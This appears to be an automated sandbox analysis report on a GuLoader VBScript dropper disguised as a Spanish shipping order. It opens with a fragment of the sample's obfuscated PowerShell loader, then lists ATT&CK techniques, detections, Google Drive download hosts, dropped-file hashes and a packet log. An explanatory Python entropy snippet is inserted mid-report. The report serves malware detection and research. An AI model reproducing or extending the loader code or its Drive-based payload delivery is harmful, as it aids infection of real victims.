';$fordrvende=osmate11 'vask hci.dat ventdiblap vandsdepla: pres/ hets/foreodsaprorma itino mavbyggeem ste.slatighusgeosibneo reklg satslnonfue strm.c.fffcbrouioch,vamersta/pe.iouhidroc uffi?faulte paraxaxonopgerero a.rarf rsktannas=reg edseedioviolawprogrn,turklsti lo bulmatilkbdlacor&vap.rianoind gash=tymba1gangltdeleseknudrjoldfrplovtel resntpantinjongltepaulbopal j sh,ee,ftericompoumassererhven verszpo.no9geratmbrnde2afbetaannebuforl p borgcthurisnazir0 te.elblemowindtjzfootbqswimm0c rond mystyenter ';$sortsmusket=osmate11 ',carp>ligki 
';$duplicidentata=osmate11 ' leveifattieva thxkabin ';$nasalises='filamenterne';$friktionskoefficienterne='\benzinforhandlers.xan';semicalcareous (osmate11 ' t.pe$slutngtrkullbest,o gradbkra faunhealcentr:dis,uf unhorbelfasoutnut une.egla ih ivena re tainhibnhoarsddiskesj urnvsangei,yssedrhamneafskrneffem9orium3circu=a.sac$fdseleoutwon ebrv eten:c.ffea ubtrpradiopbredbd glyca isoct ,lodaang.e+ s,bs$patenfchemormiscoijeeptkarbejtdis,rinonseosynkrnovermssgnomktrmano subve,ibrofvedhnfreco ilinkbcbran.iindehesuspentadestdomm,e kor rklammndata ehofna ');semicalcareous (osmate11 'gudma$ mulkgekstrltrigooduernbrasteapseudlbetnk:apostfbalstlblandytroj vmejesed ivarl njestimonjsteenudevi serosisdiscuepeakbrdesp =lib l$sammefeksamo .ennrhorrodfor ercyclovradi,efodbana scidpredeeulnne.sjklhskallipho lelbygrni ealdt kara(nonab$ unresu derospul,r tyvstti,deslaurem,onvougemy.shulebkminveet adit mere)alleg ');semicalcareous (osmate11 'pleu,[jor,fntipsse sk ltbrutt.coiffs cance e ecrhalvpvbidarif lmacbrutie uercpovertostinki nedln f rltmegacmne bjas cionkartoafor
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
      MITRE ATT&CK matrix (techniques listed per tactic; numbers in parentheses are the superscript counts shown in the original matrix):

      Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
      Resource Development: Scripting (221); Domains; DNS Server; Virtual Private Server; Server; Botnet
      Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
      Execution: Command and Scripting Interpreter (2); Exploitation for Client Execution (1); PowerShell (2); Cron; Launchd; Scheduled Task
      Persistence: Scripting (221); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
      Privilege Escalation: Process Injection (11); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
      Defense Evasion: Masquerading (1); Virtualization/Sandbox Evasion (21); Process Injection (11); Obfuscated Files or Information (1); Software Packing (1); DLL Side-Loading (1)
      Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
      Discovery: Security Software Discovery (1); Process Discovery (1); Virtualization/Sandbox Evasion (21); Application Window Discovery (1); File and Directory Discovery (1); System Information Discovery (12)
      Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
      Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
      Command and Control: Encrypted Channel (1); Ingress Tool Transfer (1); Non-Application Layer Protocol (2); Application Layer Protocol (13); Fallback Channels; Multiband Communication
      Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
      Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
      Source | Detection | Scanner | Label | Link
      BOLUDA CORPORACI#U00d3N MAR#U00cdTIMA, S.L. PEDIDO 268e44.vbs | 32% | ReversingLabs | Script-WScript.Trojan.GuLoader |
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      Source | Detection | Scanner | Label | Link
      http://nuget.org/NuGet.exe | 0% | URL Reputation | safe |
      http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe |
      https://go.micro | 0% | URL Reputation | safe |
      https://contoso.com/ | 0% | URL Reputation | safe |
      https://nuget.org/nuget.exe | 0% | URL Reputation | safe |
      https://contoso.com/License | 0% | URL Reputation | safe |
      https://contoso.com/Icon | 0% | URL Reputation | safe |
      https://aka.ms/pscore68 | 0% | URL Reputation | safe |
      https://apis.google.com | 0% | URL Reputation | safe |
      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
      Name | IP | Active | Malicious | Antivirus Detection | Reputation
      drive.google.com | 142.250.185.206 | true | false | | unknown
      drive.usercontent.google.com | 142.250.185.65 | true | false | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://www.google.com | powershell.exe, 00000002.00000002.1646952712.000001E99A1C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99BAAF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99BAD0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99A1CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99A1AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99BAD4000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://nuget.org/NuGet.exe | powershell.exe, 00000002.00000002.1675040030.000001E9A9D9E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1675040030.000001E9A9EE1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://drive.usercontent.google.com | powershell.exe, 00000002.00000002.1646952712.000001E99BAE8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99BF1C000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000002.00000002.1646952712.000001E999F57000.00000004.00000800.00020000.00000000.sdmp | true | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000002.00000002.1646952712.000001E999F57000.00000004.00000800.00020000.00000000.sdmp | true | | unknown
https://go.micro | powershell.exe, 00000002.00000002.1646952712.000001E99B05F000.00000004.00000800.00020000.00000000.sdmp | true | URL Reputation: safe | unknown
https://drive.googPzm | powershell.exe, 00000002.00000002.1646952712.000001E99BBD6000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://drive.usercontent.googhko | powershell.exe, 00000002.00000002.1646952712.000001E99BAD4000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://contoso.com/ | powershell.exe, 00000002.00000002.1675040030.000001E9A9EE1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://drive.usercontent.google.comD=620 | powershell.exe, 00000002.00000002.1646952712.000001E99A1CC000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000002.00000002.1675040030.000001E9A9D9E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1675040030.000001E9A9EE1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/License | powershell.exe, 00000002.00000002.1675040030.000001E9A9EE1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000002.00000002.1675040030.000001E9A9EE1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://drive.google.com | powershell.exe, 00000002.00000002.1646952712.000001E99BBD6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99A1DD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E999F57000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99B9FD000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://drive.usercontent.google.com | powershell.exe, 00000002.00000002.1646952712.000001E99BF1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99BAD4000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://drive.googPb | powershell.exe, 00000002.00000002.1646952712.000001E99BAAA000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://drive.google.com | powershell.exe, 00000002.00000002.1646952712.000001E99BBD6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99BAAF000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://aka.ms/pscore68 | powershell.exe, 00000002.00000002.1646952712.000001E999D31000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://apis.google.com | powershell.exe, 00000002.00000002.1646952712.000001E99A1C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99BAAF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99BAD0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99A1CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99A1AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99BAD4000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000002.00000002.1646952712.000001E999D31000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 00000002.00000002.1646952712.000001E999F57000.00000004.00000800.00020000.00000000.sdmp | true | | unknown
Legend for the ASN column:
• No. of IPs < 25%
• 25% < No. of IPs < 50%
• 50% < No. of IPs < 75%
• 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
142.250.185.206 | drive.google.com | United States | 15169 | GOOGLEUS | false
142.250.185.65 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false
                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1540405
                                Start date and time:2024-10-23 18:42:05 +02:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 3m 21s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:7
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:BOLUDA CORPORACI#U00d3N MAR#U00cdTIMA, S.L. PEDIDO 268e44.vbs
                                renamed because original name is a hash value
                                Original Sample Name:BOLUDA CORPORACIN MARTIMA, S.L. PEDIDO 268e44.vbs
                                Detection:MAL
                                Classification:mal100.expl.evad.winVBS@4/5@2/2
                                EGA Information:Failed
                                HCA Information:
                                • Successful, ratio: 100%
                                • Number of executed functions: 8
                                • Number of non-executed functions: 0
                                Cookbook Comments:
                                • Found application associated with file extension: .vbs
                                • Stop behavior analysis, all processes terminated
                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                                • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, d.4.1.9.1.6.7.1.0.0.0.0.0.0.0.0.1.0.0.9.0.0.1.f.1.1.1.0.1.0.a.2.ip6.arpa, fe3cr.delivery.mp.microsoft.com
                                • Execution Graph export aborted for target powershell.exe, PID 432 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • VT rate limit hit for: BOLUDA CORPORACI#U00d3N MAR#U00cdTIMA, S.L. PEDIDO 268e44.vbs
Time | Type | Description
12:43:10 | API Interceptor | 49x Sleep call for process: powershell.exe modified
                                No context
                                No context
                                No context
Match (JA3 fingerprint): 3b5074b1b5d032e5620f69f9f700ff0e
Associated Sample Name / URL | Detection | Threat Name | Context
https://www.jasper.ai/ | malicious | Unknown | 142.250.185.206, 142.250.185.65
AL DALEEL ELECT SWITCH GEAR TR LLC. - PO.exe | malicious | MassLogger RAT | 142.250.185.206, 142.250.185.65
ZW_PCCE-010023024001.bat | malicious | Remcos, GuLoader | 142.250.185.206, 142.250.185.65
Distribuciones Enelca Ja#U00e9n, S.L. PEDIDO 456799.vbs | malicious | GuLoader, Snake Keylogger | 142.250.185.206, 142.250.185.65
Pedido de Cota#U00e7#U00e3o-24100004_lista comercial.vbs | malicious | GuLoader, Snake Keylogger | 142.250.185.206, 142.250.185.65
69-33-600 Kreiselkammer ER3.vbs | malicious | GuLoader, Snake Keylogger | 142.250.185.206, 142.250.185.65
PO 202410-224.vbs | malicious | Unknown | 142.250.185.206, 142.250.185.65
https://email.email.pandadoc.net/c/eJxUkMtu2zoQhp9G3NkQhxQlLbRIjo8QpKjRS5qi3QTD4TCmZYuyRNm1nr4w0PSyGwzmG3z_7xprlPWVcJHmI_fpJbjmguOnLn78cm0vTw-4fw8_dttdENzIEmoji9oYsWsAtST2VKmiVOSoJqdyVNYa9pUnKUIDOWiZA0hTgDZrUNoXnphIopaly3TORwyH9YC9Qxdp3XMSYXpJIxKjPXCTxpnFodmlNEyZusugzaDFYfiDUDxm0L7pZ9CeIVNtih33mdpIlF4hGzaGIM8ta2mV83UNlbFYlJCbQhsoM9WKPqbgA2EKsb_VACXX1jKtlM9hpQHcqiKvVsZXuvB16WTBIo6v2IflN7T_8Ly_7-p6G_bz4wbM8n1Sp6MYG7ePPU-Zzu186Pg0H4abuhj5HKZfrF4mPLvT5vndMpR0h183E0MpUvOW7q9xlXB85X820-3i3IC4xLGbBiS-Pf3v-o2eUuge_l-21bG_2vt-fvz8MwAA__9XraZ6 | malicious | Unknown | 142.250.185.206, 142.250.185.65
http://docusign.net | malicious | Unknown | 142.250.185.206, 142.250.185.65
https://c4hbh789.caspio.com/dp/32a4e0002a1934bee62047dd94d1 | malicious | Unknown | 142.250.185.206, 142.250.185.65
                                No context
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):11608
                                Entropy (8bit):4.890472898059848
                                Encrypted:false
                                SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
                                MD5:8A4B02D8A977CB929C05D4BC2942C5A9
                                SHA1:F9A6426CAF2E8C64202E86B07F1A461056626BEA
                                SHA-256:624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
                                SHA-512:38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
                                Malicious:false
                                Reputation:moderate, very likely benign file
                                Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):64
                                Entropy (8bit):1.1940658735648508
                                Encrypted:false
                                SSDEEP:3:NlllulxmH/lZ:NllUg
                                MD5:D904BDD752B6F23D81E93ECA3BD8E0F3
                                SHA1:026D8B0D0F79861746760B0431AD46BAD2A01676
                                SHA-256:B393D3CEC8368794972E4ADD978B455A2F5BD37E3A116264DBED14DC8C67D6F2
                                SHA-512:5B862B7F0BCCEF48E6A5A270C3F6271D7A5002465EAF347C6A266365F1B2CD3D88144C043D826D3456AA43484124D619BF16F9AEAB1F706463F553EE24CB5740
                                Malicious:false
                                Reputation:moderate, very likely benign file
                                Preview:@...e................................. ..............@..........
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Reputation:high, very likely benign file
                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:HTML document, ASCII text, with very long lines (1692), with no line terminators
                                Category:dropped
                                Size (bytes):1692
                                Entropy (8bit):5.112760527608317
                                Encrypted:false
                                SSDEEP:24:hazspfXlvhXlhEG0qnXXX08Ucq9J8mZoWHMzj+cB7jTsoT9FyVZ81wmna:7pf1mRq+fjsueFYaWJ
                                MD5:C33BC1D2DC44F479F45A6CB99F0899B8
                                SHA1:6F50DD20E73B4B7BBF120D4265F6207AD423ECA6
                                SHA-256:81D6A870EB4E01CA88FA7B8EEE9913CCABB307C731AFE6F166E375E0F6CF4FF3
                                SHA-512:366D7F7AD2B924F45E71D0058F34ABE11668C5207B060C590EDE7D8F3E8D94958A2A101B01FB55788D28C207E7D1C85927CBA19D825FD4CD1CC65FEB32AEF572
                                Malicious:false
                                Preview:<!DOCTYPE html><html><head><title>Google Drive - Infected file</title><meta http-equiv="content-type" content="text/html; charset=utf-8"/><style nonce="EaP2ND_woY6bCFVL7AOQhw">.goog-link-button{position:relative;color:#15c;text-decoration:underline;cursor:pointer}.goog-link-button-disabled{color:#ccc;text-decoration:none;cursor:default}body{color:#222;font:normal 13px/1.4 arial,sans-serif;margin:0}.grecaptcha-badge{visibility:hidden}.uc-main{padding-top:50px;text-align:center}#uc-dl-icon{display:inline-block;margin-top:16px;padding-right:1em;vertical-align:top}#uc-text{display:inline-block;max-width:68ex;text-align:left}.uc-error-caption,.uc-warning-caption{color:#222;font-size:16px}#uc-download-link{text-decoration:none}.uc-name-size a{color:#15c;text-decoration:none}.uc-name-size a:visited{color:#61c;text-decoration:none}.uc-name-size a:active{color:#d14836;text-decoration:none}.uc-footer{color:#777;font-size:11px;padding-bottom:5ex;padding-top:5ex;text-align:center}.uc-footer a{colo
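Each dropped-file entry above carries an "Entropy (8bit)" value and an "Encrypted" verdict derived from it. The following Python is an added example, not code from the Joe Sandbox report, showing how that figure is computed and how triage tools turn it into a packed/encrypted heuristic. The AppLocker probe string is taken from the entry above, with the trailing space that makes it the listed 60 bytes; the 7.0-bits threshold, the 64-byte size floor and the SHA-256-chained "random blob" are this example's own assumptions, not the sandbox's rule.

```python
import hashlib
import math
from collections import Counter

# Constructed sample: the AppLocker probe file dropped above, including the
# trailing space that brings it to the 60 bytes the report lists.
APPLOCKER_PROBE = b"# PowerShell test file to determine AppLocker lockdown mode "


def shannon_entropy_8bit(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for empty or single-valued data, 8.0 at most."""
    n = len(data)
    if n == 0:
        return 0.0
    return sum(-(c / n) * math.log2(c / n) for c in Counter(data).values())


def looks_encrypted(data: bytes, threshold: float = 7.0, min_size: int = 64) -> bool:
    """Triage heuristic: near-uniform byte distribution over a non-trivial length.

    The threshold and size floor are assumptions of this example, not Joe Sandbox's rule.
    """
    return len(data) >= min_size and shannon_entropy_8bit(data) >= threshold


def constructed_random_blob(n: int = 4096, seed: bytes = b"example") -> bytes:
    """Deterministic stand-in for an encrypted payload: chained SHA-256 output."""
    out, block = bytearray(), seed
    while len(out) < n:
        block = hashlib.sha256(block).digest()
        out += block
    return bytes(out[:n])


def triage(name: str, data: bytes) -> dict:
    """Produce the size/entropy/encrypted fields the dropped-file entries above show."""
    return {
        "name": name,
        "size": len(data),
        "entropy": round(shannon_entropy_8bit(data), 6),
        "encrypted": looks_encrypted(data),
    }


if __name__ == "__main__":
    for name, data in [("applocker-probe", APPLOCKER_PROBE),
                       ("random-blob", constructed_random_blob())]:
        print(triage(name, data))
```

Running it reproduces the report's 4.038920595 for the probe file, which is why the entry is marked "Encrypted: false": an English sentence uses a couple of dozen byte values, so its entropy sits around 4 bits, while a ciphertext or packed blob of any useful size approaches 8. The size floor matters because tiny files (like the 64-byte entry above with entropy 1.19) have too few samples for the measure to mean anything.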
                                File type:ASCII text, with CRLF line terminators
                                Entropy (8bit):4.862104479443822
                                TrID:
                                • Visual Basic Script (13500/0) 100.00%
                                File name:BOLUDA CORPORACI#U00d3N MAR#U00cdTIMA, S.L. PEDIDO 268e44.vbs
                                File size:539'501 bytes
                                MD5:7b8f65c95deba3838f09c3c5e8f06c0c
                                SHA1:23f1d2f39788402c16ba1f5d6932eb4bef6df983
                                SHA256:da852e6aeab8c6422eecc57d741aae2a49abd26ee2d29185c0fa8f898f4bdf71
                                SHA512:dd47543459445da9edbb596e987472eac6408159af6ddd55b174896cd6fb3b90f1ba8229d26ca7ebd6fff46b27a6ed7bfa1fc19d805e8c9bd7c0131a7bcf39ba
                                SSDEEP:6144:RV/75X5P9mqNDV7MbA9hftqVDrITVFWCTf90ieURGrMDI1xFz0zhdwu07QBmU1oI:9L/NhVQRI5FL9fTRMzKwuk41omig
                                TLSH:65B43BB2D96806968E4B279AFCA49AC1C6BCC1054B2720F6FFD9474D500B4ECE3FD619
                                File Content Preview:Function Unrecuperativeness(Prelaticallypipkin,Steeperspremultiplicati)....Kapitalforsikrin = String(95,"I") ....If Steeperspremultiplicati = "Acquaint75" Then ....desalinizingbre = FormatDateTime("8/8/8")....End If..End Function ..Sub trompetisters(Forla
                                Icon Hash:68d69b8f86ab9a86
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 23, 2024 18:43:11.634038925 CEST | 49704 | 443 | 192.168.2.8 | 142.250.185.206
Oct 23, 2024 18:43:11.634088993 CEST | 443 | 49704 | 142.250.185.206 | 192.168.2.8
Oct 23, 2024 18:43:11.634167910 CEST | 49704 | 443 | 192.168.2.8 | 142.250.185.206
Oct 23, 2024 18:43:11.660900116 CEST | 49704 | 443 | 192.168.2.8 | 142.250.185.206
Oct 23, 2024 18:43:11.660922050 CEST | 443 | 49704 | 142.250.185.206 | 192.168.2.8
Oct 23, 2024 18:43:12.524125099 CEST | 443 | 49704 | 142.250.185.206 | 192.168.2.8
Oct 23, 2024 18:43:12.524288893 CEST | 49704 | 443 | 192.168.2.8 | 142.250.185.206
Oct 23, 2024 18:43:12.525233030 CEST | 443 | 49704 | 142.250.185.206 | 192.168.2.8
Oct 23, 2024 18:43:12.525294065 CEST | 49704 | 443 | 192.168.2.8 | 142.250.185.206
Oct 23, 2024 18:43:12.528904915 CEST | 49704 | 443 | 192.168.2.8 | 142.250.185.206
Oct 23, 2024 18:43:12.528915882 CEST | 443 | 49704 | 142.250.185.206 | 192.168.2.8
Oct 23, 2024 18:43:12.529223919 CEST | 443 | 49704 | 142.250.185.206 | 192.168.2.8
Oct 23, 2024 18:43:12.541387081 CEST | 49704 | 443 | 192.168.2.8 | 142.250.185.206
Oct 23, 2024 18:43:12.587332964 CEST | 443 | 49704 | 142.250.185.206 | 192.168.2.8
Oct 23, 2024 18:43:12.905246019 CEST | 443 | 49704 | 142.250.185.206 | 192.168.2.8
Oct 23, 2024 18:43:12.952677011 CEST | 49704 | 443 | 192.168.2.8 | 142.250.185.206
Oct 23, 2024 18:43:12.952707052 CEST | 443 | 49704 | 142.250.185.206 | 192.168.2.8
Oct 23, 2024 18:43:12.999562979 CEST | 49704 | 443 | 192.168.2.8 | 142.250.185.206
Oct 23, 2024 18:43:13.005120039 CEST | 49704 | 443 | 192.168.2.8 | 142.250.185.206
Oct 23, 2024 18:43:13.005229950 CEST | 443 | 49704 | 142.250.185.206 | 192.168.2.8
Oct 23, 2024 18:43:13.005296946 CEST | 49704 | 443 | 192.168.2.8 | 142.250.185.206
Oct 23, 2024 18:43:17.879332066 CEST | 49705 | 443 | 192.168.2.8 | 142.250.185.206
Oct 23, 2024 18:43:17.879379988 CEST | 443 | 49705 | 142.250.185.206 | 192.168.2.8
Oct 23, 2024 18:43:17.879451990 CEST | 49705 | 443 | 192.168.2.8 | 142.250.185.206
Oct 23, 2024 18:43:17.879734039 CEST | 49705 | 443 | 192.168.2.8 | 142.250.185.206
Oct 23, 2024 18:43:17.879750013 CEST | 443 | 49705 | 142.250.185.206 | 192.168.2.8
Oct 23, 2024 18:43:18.727818012 CEST | 443 | 49705 | 142.250.185.206 | 192.168.2.8
Oct 23, 2024 18:43:18.727931023 CEST | 49705 | 443 | 192.168.2.8 | 142.250.185.206
Oct 23, 2024 18:43:18.728523016 CEST | 443 | 49705 | 142.250.185.206 | 192.168.2.8
Oct 23, 2024 18:43:18.728694916 CEST | 49705 | 443 | 192.168.2.8 | 142.250.185.206
Oct 23, 2024 18:43:18.730186939 CEST | 49705 | 443 | 192.168.2.8 | 142.250.185.206
Oct 23, 2024 18:43:18.730201006 CEST | 443 | 49705 | 142.250.185.206 | 192.168.2.8
Oct 23, 2024 18:43:18.730443954 CEST | 443 | 49705 | 142.250.185.206 | 192.168.2.8
Oct 23, 2024 18:43:18.731571913 CEST | 49705 | 443 | 192.168.2.8 | 142.250.185.206
Oct 23, 2024 18:43:18.779333115 CEST | 443 | 49705 | 142.250.185.206 | 192.168.2.8
Oct 23, 2024 18:43:19.090812922 CEST | 443 | 49705 | 142.250.185.206 | 192.168.2.8
Oct 23, 2024 18:43:19.091459990 CEST | 49705 | 443 | 192.168.2.8 | 142.250.185.206
Oct 23, 2024 18:43:19.091526031 CEST | 443 | 49705 | 142.250.185.206 | 192.168.2.8
Oct 23, 2024 18:43:19.091595888 CEST | 49705 | 443 | 192.168.2.8 | 142.250.185.206
Oct 23, 2024 18:43:19.092257977 CEST | 49706 | 443 | 192.168.2.8 | 142.250.185.65
Oct 23, 2024 18:43:19.092293978 CEST | 443 | 49706 | 142.250.185.65 | 192.168.2.8
Oct 23, 2024 18:43:19.092389107 CEST | 49706 | 443 | 192.168.2.8 | 142.250.185.65
Oct 23, 2024 18:43:19.092827082 CEST | 49706 | 443 | 192.168.2.8 | 142.250.185.65
Oct 23, 2024 18:43:19.092840910 CEST | 443 | 49706 | 142.250.185.65 | 192.168.2.8
Oct 23, 2024 18:43:19.964831114 CEST | 443 | 49706 | 142.250.185.65 | 192.168.2.8
Oct 23, 2024 18:43:19.964946985 CEST | 49706 | 443 | 192.168.2.8 | 142.250.185.65
Oct 23, 2024 18:43:19.967866898 CEST | 49706 | 443 | 192.168.2.8 | 142.250.185.65
Oct 23, 2024 18:43:19.967874050 CEST | 443 | 49706 | 142.250.185.65 | 192.168.2.8
